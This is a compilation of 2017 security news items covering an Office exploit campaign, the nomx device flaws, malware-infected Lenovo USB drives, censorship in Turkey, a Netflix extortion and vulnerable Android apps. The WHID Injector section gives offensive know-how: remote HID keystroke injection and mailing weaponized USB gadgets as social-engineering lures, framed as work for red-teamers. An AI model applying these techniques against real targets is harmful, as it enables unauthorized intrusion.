Iranian Hackers Exploit Recent Office 0-Day in Attacks: Report
1.5.2017 securityweek BigBrothers
A recently patched vulnerability in Microsoft Office has been abused by Iranian threat actors in attacks against Israeli organizations, researchers from security firm Morphisec reveal.
Carried out between April 19 and April 24, 2017, the politically-motivated, targeted campaign was leveraging the CVE-2017-0199 vulnerability in Office that Microsoft patched earlier this month, after it had been already abused in live attacks. Because many organizations failed to apply the patch, however, the vulnerability continues to offer a viable attack surface.
The attacks targeting Israeli organizations, Morphisec explains, were delivered through compromised email accounts at Ben-Gurion University, which is home to Israel’s Cyber Security Research Center. The actors behind the attack used an existing proof-of-concept (published after the patch was released) to deliver a fileless variant of the Helminth Trojan agent.
The security researchers identified Israeli high-tech development companies, medical organizations and education organizations as victims of the attacks. They also attribute the assaults to an Iranian hacker group known to be responsible for the OilRig malware campaigns.
According to Morphisec, the analyzed Helminth fileless agent was found to be a near perfect match to the OilRig campaign that hit 140 financial institutions in the Middle East last year (at the beginning of 2017, the same actor was revealed to have used a fake Juniper Networks VPN portal and fake University of Oxford websites to deliver malware to several Israeli organizations).
The security researchers also reveal that the threat actors decided to switch from malicious macros in Excel and Word documents to a vulnerability exploit. It’s also worth noting that the group set up the attack fast, mainly because there was only a small window of opportunity between the patch release and rollout.
The abused vulnerability allows actors to use malicious HTA (HTML Application) files that Object Linking and Embedding (OLE) functionality in decoy RTF (Rich Text Format) documents linked to. Once the victim opens the malicious RTF, the HTA file is downloaded, which loads and executes a final payload.
Microsoft addressed the issue in its April 11 set of security patches, but not before cybercriminals started abusing it in new attacks. Some of the most prominent threats observed leveraging the exploit included Dridex, along with Latentbot and WingBird.
“Every few years, a new ‘logic bug’ CVE in OLE object linking is identified; the previous one was three years ago (CVE-2014-0640). This kind of vulnerability is rare but powerful. It allows attackers to embed OLE objects (or links in the case of CVE-2017-0199) and bypass Microsoft validation of OLE execution without warning. In essence, it is the same as playing animation in PowerPoint,” the security researchers conclude.
Email Security Device "nomx" Has Serious Flaws: Researchers
1.5.2017 securityweek Vulnerebility
Researchers claim to have found some serious vulnerabilities in “nomx,” a product designed for securing email communications. The vendor has disputed the findings and assured customers that its devices cannot be hacked remotely.
Nomx is a protocol and device that allegedly “ensures absolute privacy for personal and commercial email and messaging.”
British researchers Scott Helme and Professor Alan Woodward have been asked by the BBC to analyze the nomx personal email server appliance, which costs between $199 and $399, depending on its storage capacity. Their analysis revealed the existence of several security issues, including flaws that can be exploited remotely to hijack a device.
An inspection of nomx hardware components showed that the device had actually been powered by a Raspberry Pi, which made it easier for the experts to gain root access and analyze the software running on it.Nomx not as secure as vendor claims
In a post published on his personal blog, Helme said he found several pieces of outdated software running on the email security device, including Raspbian and PHP from 2015, OpenSSL and MySQL versions from 2016, a Postfix variant from 2013, and nginx and Dovecot from 2012.
According to Helme, the software running on the device does not do much in terms of securing email communications, and the expert said many major email service providers may actually block messages sent via nomx as they share some characteristics with spam.
An analysis of the nomx web interface revealed the existence of several cross-site scripting (XSS) and cross-site request forgery (CSRF) vulnerabilities. Helme said the CSRF flaws can be exploited to create new administrator accounts (i.e. backdoors) and make configuration changes by getting a user to visit a specially crafted webpage.
The researcher said he also discovered a documented, default account that provides administrator access to the device. The main problem is that the documentation does not encourage users to change the password to this account and there is no mechanisms in place to force a password change after the first login.
Helme also reported that the device he had analyzed had no update mechanism that would allow users to patch the vulnerable software running on the appliance.
Nomx disputes findings and says researchers made false claims
In a statement posted on its website, Nomx disputed the findings and accused the researchers of making false claims. The company said the attack methods detailed by Helme on his blog could not be carried out in a real world scenario.
Nomx pointed out that Helme’s attack involved physical access to the device. However, the researcher said he conducted hardware hacking in order to find out more about how the device works, but this phase of his research is not related to the attacks that can be launched remotely.
Nomx said only earlier versions of its product were based on a Raspberry Pi and claimed the analyzed devices were actually demo units. The firm also provided recommendations on how users can protect themselves against potential CSRF attacks.
“No nomx devices, accounts or data was ever compromised and the blogger could not show any evidence of such actions,” the company stated.
The vendor claims to have challenged Helme and others to hack its device in a real world scenario, but they allegedly failed to complete the task. On the other hand, the researcher denies taking part in this test.
Both the experts and the BBC said they stand by their reports and claimed that the devices they received for testing were described as production units, not early demo units.
NATO Locked Shields 2017, world’s largest cyber defence exercise just ended
1.5.2017 securityaffairs BigBrothers
Locked Shields is the world’s largest and most advanced international technical live-fire cyber defence exercise organized by the NATO since 2010.
Locked Shields is the world’s largest and most sophisticated international cyber defence exercise. It is an annual event since 2010, Locked Shields is organized by the NATO Cooperative Cyber Defence Centre of Excellence and aims to trains security experts who protect national IT infrastructure.
Locked Shields 2017 is organised in cooperation with the Estonian Defence Forces, the Finnish Defence Forces, the Swedish Defence University, the British Joint Army, the United States European Command, Air Operations COE and Tallinn University of Technology.
This year edition was recently concluded (24–28 Apr 2017), it involved around 800 participants from 25 nations.
While the organisers of the Locked Shields 2017 exercise were in Tallinn, Estonia, the participating Blue Teams worked remotely through secure connections from their home bases.
The exercise stresses participants asking them to face different trials, including organizing an incident response, solving forensic challenges, and responding to legal and strategic communications and scenario injects.
Locked Shields is a strategic event that puts participants in front of cutting-edge technologies and hacking techniques, this is the only way to face even more complex cyber threats in a real word cyber scenario.
“To stay abreast of market developments, Locked Shields focuses on realistic and cutting-edge technologies, networks and attack methods.” reads the official announcement.
The cyber defence exercise was just ended, the Blue Teams have been tasked to maintain the services and networks of a military air base of a fictional country.
In the simulation, the air base was experiencing a wide range of cyber attacks on its electric power grid system, unmanned aerial vehicles, military command and control systems, critical information infrastructure components and other operational infrastructure.
“The size and scope of technologies, networks and devices used in Locked Shields 2017 has increased considerably – leading to more attacks and specialised systems involved.” continues the announcement. “Specialised systems enable teams to practice the defence of systems that they are not working with on a regular basis. However, in the modern threat landscape incidents with specialised systems may potentially have a profound effect on a military mission or the entire society.”
The experts launched more than 2500 possible attacks against Blue Teams, according to the NATO IT staff more than 3000 virtualised systems have been deployed during the exercise.
For this first time in the history of the event, this year the NATO has run a strategic track to the exercise.
The exercise also involved industry partners such as Siemens AG, Threod Systems, Cyber Test Systems, Clarified Security, Iptron, Bytelife, BHC Laboratory, openvpn.net, GuardTime and numerous others.
The Italian team was composed of a group of experts from three armed forces, Carabinieri, along with researchers from CINECA (Interuniversity Consortium for the Management of Electronic Calculation Center), Universities of Rome La Sapienza and Genoa.
The Ministry of the Interior also took part in the exercise with a group of analysts from the National Anti-Crime Center for Critical Infrastructure Protection (CNAIPIC).
Graph theory applied to a portion of the Dark Web shows it a set of largely isolated dark silos
1.5.2017 securityaffairs Security
A group of researchers conducted a study on the Dark Web leveraging the Graph theory. This hidden space appears as composed by sparse and isolated silos.
A group of experts from the Massachusetts Institute of Technology’s SMART lab in Singapore has recently published an interesting research paper on the Dark Web.
The researchers collected and analyzed the dark web (a.k.a. the “onionweb”) hyperlink graph, they discovered highly dissimilar to the well-studied world wide web hyperlink graph.
The team led by Carlo Ratti, director of MIT’s Senseable City Lab, used the Graph theory as a tool for analyzing social relationships for the dark web.
The experts analyzed the Tor network, one of the most popular darknet, they used crawler leveraging the tor2web proxy onion.link.
It is important to highlight that the team focused its analysis on the Tor Network, that anyway represents just a portion of the dark web.
The team crawled onion.link using the commercial service scrapinghub.com, they used two popular lists of dark web sites trying to visit them and accessing all linked pages using a breadth-first search.
The team just included in their analysis websites which responded to avoid including in their results services that no longer exist.
“I.e., if we discover a link to a page on domain v, but domain v could not be reached after >10 attempts across November 2016–February 2017, we delete node v and all edges to node v.
In our analysis, before pruning nonresponding domains we found a graph of 13,117 nodes and 39,283 edges. After pruning, we have a graph of 7, 178 nodes and 25, 104 edges (55% and 64% respectively)” states the researchers.
The first discrepancy emerged from the research is related to the number of the active .onion domain. The maintainers at the Tor Project Inc. states that the Tor network currently hosts ∼60, 000 distinct, active .onion addresses, meanwhile the team of experts has found only 7, 178 active .onion domains.
The researchers attribute this high-discrepancy to various messaging services— particularly TorChat, Tor Messenger, and Ricochet in which each user is identified by a unique .onion domain.
The Graph-theoretic results show that ∼30% of domains have exactly one incoming link—of which 62% come from one of the five largest out-degree hubs. 78% of all nodes received a connection from at least one of them.
The most intriguing aspect of the research is that 87% of sites do not link to any other site, this discovery has a significant impact on all graph-theoretic measures (see darkweb out-degree in the following image).
“We conclude that in the term “darkweb”, the word “web” is a connectivity misnomer. Instead, it is more accurate to view the darkweb as a set of largely isolated dark silos” wrote the experts. reads the paper. “In our darkweb graph, each vertex is a domain and every directed edge from u → v means there exists a page within domain u linking to a page within domain v. The weight of the edge from u → v is the number of pages on domain u linking to pages on domain v.”
I believe this research could be a starting point for further works, Ratti and his team, along with other researchers could conduct further investigations on the Dark Web, not limiting their analysis to the Tor Network.
Ratti announced that his team is working on the definition of new models to use in further researches.
“As next step,” Ratti said, “we are planning to develop a model to explain how a network develops when nodes do not trust each other.”
WHID Injector: How to Bring HID Attacks to the Next Level
1.5.2017 securityaffairs Hacking
Luca Bongiorni was working on a cheap and dedicated hardware that he could remotely control (i.e. over WiFi or BLE), that is how WHID was born.
Since the first public appearance of HID Attacks (i.e. PHUKD, Kautilya, Rubberducky), many awesome researches and results have been published [i.e. Iron HID, Mousejack and the coolest USaBUSe].
Due this increased amount of nifty software, as Pentester and Red-Teamer, I wanted a cheap and dedicated hardware that I could remotely control (i.e. over WiFi or BLE). And this is how WHID was born.
Since the inception of my first HID injecting devices (based on Teensy boards, see photo below), I always faced the need to decide when to deliver a certain payload. This was partially achieved by using Irongeek’s photoresistor and dip-switch tricks [1].
However, I soon realized that would be cool the full remote control over a radio channel. At the beginning, years ago, I was thinking to use some cheap 433 MHz TRX modules connected to the Teensy board… sadly due to lack of time and other cool projects… this idea was dropped into my awesome pen testing-tools to-do-list. 😋
What is WHID Injector?
At this point, you are wondering what is behind WHID Injector and what are its capabilities. 😎
WHID stands for WiFi HID injector. It is a cheap but reliable piece of hardware designed to fulfill Red-Teamers & Pentesters needs related to HID Attacks, during their engagements.
The core of the WiFi HID injector is mainly an Atmega 32u4 (commonly used in many Arduino boards) and an ESP-12s (which provides the WiFi capabilities and is commonly used in IoT projects).
WHID’s Software
When I started to think about a remotely controlled HID injector and thus adding an ESP chipset to an Arduino-like board, I soon figured out that already exists some hardware that could fulfill my need: AprBrother’s Cactus Micro Rev2 (which was at EOL L).
Nonetheless, I started to read ESP specs and think how to create a simple PoC sketch that would let me upload remotely malicious payloads through the WiFi AP. And here it is [2] (I would like to thanks Corey from http://www.LegacySecurityGroup.com for his initial experiments).
Afterwards with a working software on my hands, I wanted to improve the EOL Cactus Micro rev2 hardware (considering that is also compatible with USaBUSe [3]).
Overall, this is how my simple GUI looks (I know it looks awful, but works! 😁):
Third-Party Software Supported
USaBUSe – Github Repo
This awesome tool has been created by @RoganDawes from @SensePost.
It is more than a simple remote HID injector! It permits to bypass air-gapped environments and have a side-channel C&C communication over WHID’s ESP wifi!
o Further links:
Defcon 24 Video
Defcon 24 Slides
https://sensepost.com/blog/2016/universal-serial-abuse/
USaBUSe Video PoC
Cyberkryption’s Tutorial
WiFi Ducky – Github Repo
This is a nice project developed by @spacehuhn and it brings even further my simplistic WHID’s software, by adding cool features like: realtime injection, ESP fw OTA update, etc.
WiDucky – Github Repo
An older-but-cool project, which has the pro feature to use the ESP’s wifi as C&C communication channel. It also has its own Android app for remote control.
Some Video Tutorials
I will leave here a couple of videos about WHID Injector’s installation and capabilities.
WHID Attack Simulation against Windows 10 Enterprise
Wifi Ducky on WHID device (WINDOWS)
How To Install WHID Injector Software on WINDOWS
How To Install WHID Injector Software on OSX
Possible Applications
Classic – Remote Keystrokes Injection Over WiFi
Deploy WHID on Victim’s machine and remotely control it by accessing its WiFi AP SSID. (eventually, you can also setup WHID to connect to an existing WiFi network)
Social Engineering – Deploy WHID inside an USB-enable gadget
The main idea behind it, is to test for Social Engineering weaknesses within your target organization (e.g. DLP policy violations) and to bypass physical access restrictions to the victim’s PC.
Usually, I create a fancy brochure (sample template https://github.com/whid-injector/WHID/tree/master/tools/Social_Engineering_Lures ) attached with a weaponized USB gadget and then use a common delivery carrier (e.g. UPS, DHL, FedEx).
WHID
Conclusion
As you noticed from the 3rd Party Softwares above, WHID has a lot of potential. Not only to play the usual role of HID injector but also to bypass Air-Gapped environments.
If you would like to play with it… AprBrother opened the pre-orders here
https://blog.aprbrother.com/product/cactus-whid
So far, beta testers already provided very precious feedbacks to improve the final version of WHID. I’d like to thank @RoganDawes for suggesting to add the Hall Sensor as reset switch!
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
https://github.com/whid-injector/WHID/tree/master/sketches/cactus_micro_rev2
https://github.com/sensepost/USaBUSe
Lenovo warns of IBM Storwize shipped with infected initialization USB drives
30.4.2017 securityaffairs Virus
Some USB flash drives containing the initialization tool shipped with the IBM Storwize for Lenovo contain a malicious file.
Some USB flash drives containing the initialization tool shipped with the IBM Storwize for Lenovo V3500, V3700 and V5000 Gen 1 storage systems contain a file that has been infected with malicious code.
The Initialization Tool on the USB flash drive having part number 01AC585 that shipped with the following System models may have the malicious file:
IBM Storwize for Lenovo V3500 – 6096 models 02A and 10A
IBM Storwize for Lenovo V3700 – 6099 models 12C, 24C and 2DC
IBM Storwize for Lenovo V5000 – 6194 models 12C and 24C
IBM Storwize for Lenovo Systems with serial numbers starting with the characters 78D2 are not impacted.
The news was reported by Lenovo, the IBM Storwize systems are virtualizing RAID computer data storage systems manufactured by IBM.
According to Lenovo, the malicious file does not affect the integrity or performance of the storage systems.
Experts from Lenovo reported that when the initialization tool is launched from the USB flash drive onto a computer used for initial configuration, it copies itself to a temporary folder on the hard drive of the desktop or laptop along with the malicious file.
The Initialization USB flash drive contains a folder called InitTool, the tool and the malware are copied to the following temporary folder:
On Windows systems: %TMP%\initTool
On Linux and Mac systems: /tmp/initTool
It is important to highlight that the malicious file isn’t executed in this phase.
“Important: While the malicious file is copied onto the computer, the file is not executed during initialization and is not run unless a user manually executes it. The infected file does not affect the IBM Storwize for Lenovo system.” states a security advisory published by Lenovo. “The initialization tool is only used to write a text file on the USB key, which is then read by Storwize, which will then write a separate text file onto the key. At no point during the time that the USB thumb drive is inserted in the Storwize system is any information copied from the thumb drive directly to the Storwize system, nor is any code executed on the Storwize system.”
IBM and Lenovo have adopted necessary measures to prevent any other problem in the supply chain and stopping the shipment of additional USB flash drives.
Lenovo suggests customers don’t use the affected flash drives instead they need to contact the company to receive support for the first configuration of the Storwize systems.
Customers that have already used the initialization USB flash drive from one of the affected products need to verify is their antivirus software has already detected and removed the malicious file.
To manually remove the malicious file, customers can delete the temporary directory:
On Windows systems: %TMP%\initTool
On Linux and Mac systems: /tmp/initTool
“In addition, for Windows systems, ensure the entire directory is deleted (not moved to the Recycle Bin folder). This can be accomplished by selecting the directory and Shift->Right-click->Delete the directory.” suggests Lenovo.
Let me close sharing with you the MD5 hash of the malicious file.
0178a69c43d4c57d401bf9596299ea57
Turkey banned Wikipedia because its content web contents that represents a threat to national security
30.4.2017 securityaffairs BigBrothers
The monitoring group Turkey Blocks confirmed that Turkey banned Wikipedia because its content web content that represents a threat to national security.
According to the telecommunications watchdog, Turkey has blocked the access to the online encyclopedia Wikipedia on Saturday, the Government has taken this decision citing a law that allows it to ban access to web contents that represents a threat to national security.
Under the law, the watchdog has to submit the ban to a court within 24 hours, then the court has two days to decide whether the ban should be confirmed.
“After technical analysis and legal consideration … an administrative measure has been taken for this website (Wikipedia.Org),” the BTK telecommunications watchdog said in a statement on its website.
Monitoring group Turkey Blocks first observed the block of Wikipedia at 8:00 a.m. (1.00 a.m. ET) on Saturday.
“The loss of availability is consistent with internet filters used to censor content in the country,” reported Turkey Blocks.
Turkey Blocks ✔ @TurkeyBlocks
Confirmed: All editions of the #Wikipedia online encyclopedia blocked in #Turkey as of 8:00AM local timehttps://turkeyblocks.org/2017/04/29/wikipedia-blocked-turkey/ …
7:22 AM - 29 Apr 2017
2,770 2,770 Retweets 936 936 likes
The Turkish communications Ministry announced that Wikipedia has been banned due to its attempts to run a “smear campaign” against Turkey. Some pages in the encyclopedia purported that the Turkish Government was coordinating with militant groups.
“Instead of coordinating against terrorism, it has become part of an information source which is running a smear campaign against Turkey in the international arena,” reported the Anadolu Agency.
Turkey it asking Wikipedia to remove the content that doesn’t meet its demands, only in this case, the ban will be lifted.
Turkey Blocks ✔ @TurkeyBlocks
Confirmed: All editions of the #Wikipedia online encyclopedia blocked in #Turkey as of 8:00AM local timehttps://turkeyblocks.org/2017/04/29/wikipedia-blocked-turkey/ …
7:22 AM - 29 Apr 2017
2,770 2,770 Retweets 936 936 likes
Turkey has adopted similar measures in the past, the Government blocked major social media platforms such as Twitter or Facebook. The Turkish Government always denied censorship actives and blamed outages on spikes in usage after major events.
Security experts confirmed that the blackouts on social media are the result of the operations of the government to stop the spread of militant images and propaganda.
“President Tayyip Erdogan says the measures are needed given the scope of the security threat Turkey faces.” reported the Reuters agency.
“Turkey last year jailed 81 journalists, making it the world’s top jailor of journalists, according to the New York-based Committee to Protect Journalists.”
Hacker holds Netflix to ransom over new episodes of Orange Is The New Black
30.4.2017 securityaffairs Ransomware
The hacked ‘The Dark Overlord’ claims to have stolen and leaked online episodes from the forthcoming season of the TV show Orange Is The New Black.
A hacker who goes online with the moniker “The Dark Overlord” claims to have stolen episodes from the forthcoming season of the TV show ‘Orange is the New Black.’
The Dark Overlord demanded an unspecified sum to Netflix, but the company did not accept to pay the ransom so the hacker released the episodes online sharing a link to a downloadable torrent on The Pirate Bay.
The Dark Overlord also announced to have stolen other TV shows of other broadcasters including ABC, Fox, and National Geographic.
Below the hacker’s message:
“We’re back again. Did you miss us? Of course, you did. We’re willing to bet Netflix did as well. Speaking of which, Netflix clearly received our message considering they’ve made public statements and was one of the first people to download a fresh copy of their own property (Hello, [redacted IP address]!) – yet they continue to remain unresponsive. With this information in mind (and the fact that leaving people on cliffhangers isn’t fun) we’ve decided to release Episodes 2-10 of “Orange Is The New Black” Season 5 after many lengthy discussions at the office where alcohol was present. Do note that there are 13 episodes. However, we were so early when we acquired the copies that post hadn’t gotten around to Episodes 11-13. Perhaps Netflix will consider releasing the season earlier now that the cat’s out of the bag?
We’re not quite done yet, though. We’re calling you out: ABC, National Geographic, Fox, IFC, and of course Netflix, still. There’s more Netflix on the feasting menu soon (in addition to the other studios, of course), but we’ll get to that later. Enjoy the fruits of _our_ labour.”
Experts speculate the hacker has obtained the material hacking one of the companies assisting with the production or promotion of the TV series.
The news was confirmed by Netflix that declared that “a production vendor used by several major TV studios had its security compromised and the appropriate law enforcement authorities are involved.”
“Earlier, it said that a small production vendor that works with several major TV studios had suffered a breach. The company, based in Los Gatos, California, described the breach as an “active situation” that was being investigated by the FBI and other authorities.” states The Guardian.
On November, The Dark Overlord hacked the glue and adhesive company Gorilla Glue and stole 500 GB worth of corporate data.
US NSA Spy Agency Halts Controversial Email Sweep
30.4.2017 securityweek BigBrothers
The National Security Agency announced Friday it would end its controversial practice of sweeping up any email or text message an American exchanges with someone overseas that makes reference to a real target of NSA surveillance.
The powerful US spy agency said that although it has the legal power to continue scooping up such communications, it would halt the practice to protect the privacy of US citizens.
"NSA will no longer collect certain internet communications that merely mention a foreign intelligence target," it said in a statement.
The NSA, the country's premier signals intelligence body, is permitted to collect communications of any foreign target, but not that of Americans except in certain situations, or if it gains a warrant to do so.
Under Section 702 of the Foreign Intelligence Surveillance Act, it is allowed to scoop up a US citizen's emails or texts with someone outside the country if those merely mention a specific NSA surveillance target -- so-called "about" collection.
The practice has sparked heavy criticism from civil liberties advocates, who say it violates constitutional protections. Many have threatened to try to block the renewal of Section 702 at the end of this year if the law is not tightened. But the country's intelligence community wants the law to be renewed unchanged.
The NSA said it would voluntarily end "about" collection even if it means that it might lose access to other important information in the fight against cyber threats and terrorism.
Senator Ron Wyden, a Democrat on the Senate Intelligence Committee, praised the move but said that Section 702 needs multiple changes.
"To permanently protect Americans' rights, I intend to introduce legislation banning this kind of collection in the future," he said.
Turkey Blocks Access to Wikipedia Over 'Terror' Claims
30.4.2017 securityweek IT
Turkey on Saturday blocked all access inside the country to the online encyclopedia Wikipedia reportedly for articles claiming links between Ankara and terror groups, the latest restriction on a popular website to hit Turkish users.
Turkey's Information and Communication Technologies Authority (BTK) said it had implemented the ban against Wikipedia.org, without making clear the reason for the move. Turkish state media said the ban was imposed because Wikipedia had failed to remove content promoting terror and accusing Turkey of cooperation with various terror groups.
There was no indication as to when the ban might be removed, with a formal court order expected to follow in the coming days.
Reacting to the ban, Wikipedia's founder Jimmy Wales wrote on Twitter: "Access to information is a fundamental human right. Turkish people, I will always stand with you to fight for this right."
A block affecting all language editions of the website in Turkey was detected from 0500 GMT after an administrative order by the Turkish authorities, according to the Turkey Blocks monitoring group, which follows internet restrictions in the country.
Residents in Istanbul were unable to access any pages of Wikipedia on Saturday morning without using a Virtual Private Network (VPN), AFP correspondents said.
"The loss of availability is consistent with internet filters used to censor content in the country," Turkey Blocks said.
'Law No. 5651'
The BTK confirmed the ban in a statement but gave no details.
"After technical analysis and legal consideration based on the Law No. 5651, an administrative measure has been taken for this website Wikipedia.org," it said.
Law 5651, passed in 2014 by parliament, bolstered the BTK's control over the internet and was seen at the time by freedom of expression activists as an erosion of online liberties.
The incident quickly spawned its own separate Wikipedia entry -- "Wikipedia blocked in Turkey".
Quoting Turkey's transport and communications ministry, the state-run Anadolu news agency said the ban was imposed because Wikipedia had failed to take down content purporting to show Turkey "on the same level as and cooperating with" terror groups.
It said Turkey had kept in contact with Wikipedia but the site had failed to remove the content in question.
Should the content be removed, the order would be lifted and access restored, it said.
No further details were given but Turkey has long taken a hard line against what it calls "terror propaganda" in favour of the outlawed Kurdistan Workers' Party (PKK).
Critics of Turkey, including Kurdish militants, have accused Ankara of occasionally collaborating with jihadists in Syria, a claim fiercely rejected by the government.
'Temporary security measures'
Turkey has become notorious over the last years for temporarily blocking access to popular sites, including Facebook and Twitter, in the wake of major events such as mass protests or terror attacks.
In March 2014, YouTube was banned for several months in Turkey after the site was used to broadcast purported footage of a security meeting on Syria.
In the summer of 2013, severe restrictions were imposed on social media during huge protests against President Recep Tayyip Erdogan, who was prime minister at the time.
Savvy internet users frequently resort to the use of VPNs to get around these bans, though there have been reports that the use of VPNs has also started to be blocked.
The government says such measures are always temporary and needed for national security but critics see them as another restriction on civil liberties under Erdogan.
In November 2016, Turkey imposed restrictions lasting several hours on the messaging service WhatsApp as well as on Twitter, Facebook, YouTube and other sites following the controversial arrests of pro-Kurdish MPs.
Prime Minister Binali Yildirim acknowledged at the time that "from time to time for security reasons we can use such measures.... These are temporary measures. Once the danger is passed, everything returns to normal."
Amid uproar on social media over the latest ban, there was also speculation the decision may also have been prompted by deeply unflattering updates to Erdogan's Wikipedia profile after he won the April 16 referendum on enhancing his powers.
The government insists that the new presidential system -- largely due to come into force in 2019 -- will improve efficiency, but critics fear it will lead to one-man rule.
Videoherní průvodci jsou zneužívání k šíření malwaru
29.4.2017 SecurityWorld Viry
Hackeři zneužili desítky průvodců populárními herními tituly k šíření malwaru. Napadených jsou stovky tisíc zařízení.
Videoherní průvodci ve formě aplikací jsou zneužíváni k šíření malwaru. Bezpečnostní společnost Check Point přišla na víc než půl milionu uživatelů Androidu napadených právě tímto způsobem. Aplikace jsou přitom běžně dostupné na Google Play Store. Hackeři se s nimi jsou schopni zmocnit telefonu a následně do něj natahat škodlivý software či nechtěné reklamy.
Check Point prý objevil víc než čtyřicet takto zneužitelných aplikací, nechyběly mezi nimi ani průvodci tak populárními herními tituly jako jsou Fifa nebo Pokemon Go. Počet jejich stažení společnost odhaduje na půl až téměř dva miliony, ačkoliv není zřejmé, kolik těchto downloadů opravdu vedlo i k infikování malwarem.
„Je těžké to vystopovat, jelikož samotné aplikace žádný škodlivý kód neobsahují,“ říká Daniel Padon z Check Pointu.
Google, ač se k problému oficiálně nevyjádřil, podle Padona po upozornění dotčené aplikace z obchodu stáhnul. Firma však mezi tím objevila další, které mohou být stejně rizikové.
Podezřelé je už ale jen jejich okamžité chování po stažení. Po uživateli aplikace totiž žádají záruku, že nemohou být smazány.
Po instalaci se pak pokusí navázat kontakt s kontrolním serverem, v důsledku čehož se stanou botem v botnetu, síti zařízení kontrolovaných na dálku. Pak už je snadné do zařízení stáhnout škodlivý software. Následně podle Padona hackeři z takto infikovaného zařízení mohou rozesílat nevyžádanou reklamu, použít jej jako součást DDoS útoku anebo „jen“ špehovat data, s nimiž telefon pracuje. Nárůst mobilních botnetů je přitom alarmující.
„Jde o těžko zastavitelný trend, který může mít zičující dopad.“
To potvrzuje i Nikolaos Chrysaidos ze společnosti Avast: „V současnosti se zdá, že hackeři za touto hrozbou ji zneužívají jen k vydělávání peněz skrz reklamu. Její funkčnost je zatím velice základní. Nic ale nebrání tomu, aby se v budoucnu stala mnohem sofistikovanější.“
Insecure Apps that Open Ports Leave Millions of Smartphones at Risk of Hacking
29.4.2017 thehackernews Mobil
A team of researchers from the University of Michigan discovered that hundreds of applications in Google Play Store have a security hole that could potentially allow hackers to steal data from and even implant malware on millions of Android smartphones.
The University of Michigan team says that the actual issue lies within apps that create open ports — a known problem with computers — on smartphones.
So, this issue has nothing to do with your device's operating system or the handset; instead, the origin of this so-called backdoor is due to insecure coding practices by various app developers.
The team used its custom tool to scan over 100,000 Android applications and found 410 potentially vulnerable applications — many of which have been downloaded between 10 and 50 Million times and at least one app comes pre-installed on Android smartphones.
Here I need you to stop and first let's understand exactly what ports do and what are the related threats.
Ports can be either physical or electronic in nature. Physical ports are connection points on your smartphones and computers, such as a USB port used to transfer data between devices.
Electronic ports are those invisible doors that an application or a service use to communicate with other devices or services. For example, File Transfer Protocol (FTP) service by default opens port 21 to transfer files, and you need port 80 opened in order to connect to the Internet.
In other words, every application installed on a device opens an unused port (1-to-65535), can be referred as a virtual door, to communicate for the exchange of data between devices, be it a smartphone, server, personal computer, or an Internet-connected smart appliance.
Over the years, more and more applications in the market function over the Internet or network, but at the same time, these applications and ports opened by them can be a weak link in your system, which could allow a hacker to breach or take control of your device without your knowledge.
This is exactly what the University of Michigan team has detailed in its research paper [PDF] titled, "Open Doors for Bob and Mallory: Open Port Usage in Android Apps and Security Implications."
According to the researchers, the major issue is with the apps like WiFi File Transfer, which has been installed between 10 million and 50 million times and allows users to connect to a port on their smartphone via Wi-Fi, making it easy to transfer files from a phone to a computer.
But due to insufficient security, this ability of the apps is apparently not limited to merely the smartphone's owner, but also malicious actors.
However, applications like WiFi File Transfer pose fewer threats, as they are designed to work over a local network only, that requires attackers to be connected to the same network as yours.
On the other hand, this issue is extremely dangerous in the scenarios where you connect to a public Wi-Fi network or corporate network more often.
To get an initial estimate on the impact of these vulnerabilities, the team performed a port scanning in its campus network, and within 2 minutes it found a number of mobile devices potentially using these vulnerable apps.
"They manually confirmed the vulnerabilities for 57 applications, including popular mobile apps with 10 to 50 million downloads from official app marketplaces, and also an app that is pre-installed on a series of devices from one manufacturer," the researchers say.
"The vulnerabilities in these apps are generally inherited from the various usage of the open port, which exposes the unprotected sensitive functionalities of the apps to anyone from anywhere that can reach the open port."
No doubt, an open port is an attack surface, but it should be noted that port opened by an application can not be exploited until a vulnerability exists in the application, like improper authentication, remote code execution or buffer overflow flaws.
Besides this, an attacker must have the IP address of the vulnerable device, exposed over the Internet. But getting a list of vulnerable devices is not a big deal today, where anyone can buy a cheap cloud service to scan the whole Internet within few hours.
However, smartphones connected to the Internet via wireless network behind a router are less impacted by this issue, because in that case, attackers would need to be on the same wireless network as the victim.
To prove its point, the team of researchers has also demonstrated various attacks in a series of videos, posted below:
1. Using an app's open ports to steal photos with on-device malware
2. Stealing photos via a network attack
3. Forcing the device to send an SMS to a premium service
The team says these vulnerabilities can be exploited to cause highly-severe damage to users like remotely stealing contacts, photos, and even security credentials, and also performing sensitive actions such as malware installation and malicious code execution.
The easiest solution to this issue is to uninstall such apps that open insecure ports, or putting these applications behind a proper firewall could also solve most of the issues.
Expert discovered online data belonging to the trading firm AMP
29.4.2017 securityaffairs CyberCrime
Security expert Chris Vickery reported a data breach at online trading firm AMP that exposed customer credit reports, and Social Security numbers.
The popular security expert Chris Vickery has discovered a new data breach that affected the AMP online trading firm that exposed thousands of files, including credit reports, passport scans, and customer chat logs. This specific incident is notable for the amount of money that passes through AMP’s systems.
“I’ve come across several finance-related data breaches within the past few weeks, most recently involving the AMP Futures trading platform.” wrote the expert in a blog post.
“While the exact nature of the leak is nothing new, a third-party IT vendor’s unsecured rsync backup device, the amount of money involved is on the large side. The files indicate that AMP has over $50 million on the books and additionally include the private details of over 10,000 account applicants.”
The data leak discovered by Vickery was caused by a misconfigured backup device managed by a third-party IT vendor, it was now fixed. Such kind of incidents are unfortunately very common, Vickery has discovered similar data leaks online.
AMP is a Chicago-firm based firm that operates many platforms for online futures trading.
Vickery discovered a 70GB dump exposed on the web containing roughly 97,000 files.
“The portion I downloaded comes to about 70 gigs and represents 97,000 different files. It includes credit reports, passport scans, internal company emails, customer chat logs, and basically everything an identity thief would need in order to mount a serious campaign.” Vickery added. “I was surprised at the number of plaintext customer passwords discussed in the chat logs (by staff and customers alike).”
Vickery explained that AMP representatives were surprised when he reported the data leak.
“The head honcho over at AMP was surprised when I fully explained the situation to him over a phone call. He rightly wondered what AMP was paying its third-party IT company for. If a third party, which specializes in IT, can’t catch this kind of leakage themselves, there is some serious improvement to be done.” Vickery explained.
“AMP’s CEO was relieved to hear that I wasn’t trying to sell him anything or attempting any sort of blackmail or extortion, and I’m thankful he understood that I merely discovered the unsecured data rather than causing it to become unsecured. That’s a distinction many people fail to grasp, especially when their company is potentially in the hot seat.”
Chris Vickery discovered many other clamorous cases of open database exposed on the Internet.
In December 2015 the security expert discovered 191 million records belonging to US voters online, in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.
